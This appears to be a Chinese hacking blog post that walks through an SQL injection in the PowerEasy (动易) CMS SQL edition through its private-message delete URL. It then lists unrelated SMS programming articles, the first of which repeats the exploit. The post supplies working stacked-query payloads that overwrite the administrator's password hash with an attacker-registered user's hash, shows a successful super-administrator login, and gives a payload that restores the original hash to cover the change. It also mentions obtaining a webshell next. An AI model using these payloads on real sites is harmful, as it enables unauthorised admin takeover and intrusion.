动易SQL版新洞利用短信功能直接拿后台

先注册个号,进入控制面版给自己发条短信

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4

这就是点```

用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为

=没有登陆````ef0020cf8c5e45b9 密码是这个```

下面就开始将管理员的密码更新为我注册用户的密码````

利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....

);update pe_admin set password=(select userpassword from pe_user

where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)

%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--

这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中 user的密码```好``现在来看```需要将hack520转char

更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```

53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看

您的用户名:admin

您的身份:超级管理员

待阅短信: 1 条

成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来

user

就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```

刚刚时间到了,现在继续。。。将管理员密码改回来.

);declare @a sysname select @a=0x650066003000300032003000630066

0038006300350065003400350062003900 update pe_admin set passwo

rd=@a--  这个要转一下

更新```把管理员密码改回来  OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?

好了就到此结束!

(0)

相关推荐

  • 动易SQL版新洞利用短信功能直接拿后台

    先注册个号,进入控制面版给自己发条短信 http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4 这就是点``` 用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为 =没有登陆````ef0020cf8c5e45b9 密码是这个``` 下面就开始将管理员的密码更新为我注册用户的密码```` 利用动易爆库改库程序先将pe_admin里adminname,pass

  • 阿里大鱼简单发送短信功能.net core版

    阿里大鱼还未提供 .net core 版SDK,但提供了相关API,下面是.net core版实现,只是简单发送短信功能: using System; using System.Collections.Generic; using System.IO; using System.Net; using System.Security.Cryptography; using System.Text; using Newtonsoft.Json; namespace ConsoleApp1 { pub

  • iOS发送短信功能的实现代码

    iOS发送短信功能的实现代码

    发短信的功能对于一个需要渠道扩展的APP来说,必不可少.但是,当第一次看到这个需求时,我却一脸懵逼,因为之前并没有接触过,出于对未知事物的恐惧,被分配做这个任务的时候其实我是拒绝的,但是,没办法谁让我是小兵一个呢,只能硬着头皮强上了.在查阅了一番资料之后,发现这个功能做起来其实非常简单,不到十分钟就可以解决.下面我们就来聊一下如何实现这个功能. 首先,我们来介绍一个最为简单的方法,只需要一行代码就可以搞定,代码如下: [[UIApplication sharedApplication] open

  • Android编程实现定时发短信功能示例

    本文实例讲述了Android编程实现定时发短信功能.分享给大家供大家参考,具体如下: 第一,要实现发短信的功能,必须要用到android系统中发短信的权限,即在AndoridManifest.xml中添加如下内容 <uses-permissionandroid:name="android.permission.SEND_SMS"/> 第二,使用AlarmManager来实现一个倒计时的功能,当时间到时发送短   信.AlarmManager有两个相似的用法: 1.在指定时常

  • shell脚本编写ping包及arp的监控并发送短信功能

    下面给大家分享shell脚本编写ping包及arp的监控并发送短信功能,具体代码如下所示: #!/bin/bash NOW="`date +%Y%m%d-%H:%M:%S`" PHONES=15134567893 IP=10.100.8.78 GATEWAY=10.100.30.1 #ping失误的短信内容 content1="host is failed" #arp主机网关失误的短信内容 content2="GW is failed" #pin

  • IOS程序开发之跳转短信发送界面实现发送短信功能

    IOS程序开发之跳转短信发送界面实现发送短信功能

    项目需求:在程序开发中,我们需要在某个程序里面发送一些短信验证(不是接收短信验证,关于短信验证,传送门:http://www.cnblogs.com/wolfhous/p/5096774.html 项目实现: 新建demo,直接看我源码标志. 源码截图 真机截图 就是如此简单,如您有任何问题/建议或者更好的实现方法,联系本人. 可以看我折叠的源码 /** 点击发送短信按钮*/ - (IBAction)sendMessageBut:(id)sender { /** 如果可以发送文本消息(不在模拟器

  • python调用短信猫控件实现发短信功能实例

    python调用短信猫控件实现发短信功能实例代码如下所示: #! /usr/bin/env python #coding=gbk import sys import win32com.client ocxname='ShouYan_SmsGate61.Smsgate' axocx=win32com.client.Dispatch(ocxname) axocx.CommPort=8#设置COM端口号 axocx.SmsService='+8613800100500'#设置短信服务号码 axocx.

  • Android实现发送短信功能实例详解

    本文实例分析了Android实现发送短信功能的方法.分享给大家供大家参考,具体如下: 短信和打电话一样,都是android手机的基本功能,下面以实例说明android如何实现发送短信的功能. 程序如下所示: import java.util.regex.Matcher; import java.util.regex.Pattern; import android.app.Activity; import android.app.PendingIntent; import android.cont

  • jQuery实现订单提交页发送短信功能前端处理方法

    jQuery实现订单提交页发送短信功能前端处理方法

    本文实例讲述了jQuery实现订单提交页发送短信功能前端处理方法.分享给大家供大家参考,具体如下: 1.效果如图所示: 2.html代码: <div class="indFpho" > <p>手机号码:</p> <p> <input type="text" name="telphone" id="telphone" value="{$order_info.cons

  • Android发送短信功能代码

    本文实例讲述了Android发送短信功能代码,是进行Android程序开发中非常常见的重要功能.分享给大家供大家参考之用.具体方法如下: // 发送短信 public void sendMsg(){ String content = edtSend.getText().toString(); SmsManager smsManager = SmsManager.getDefault(); List<String> divideContents = smsManager.divideMessag

随机推荐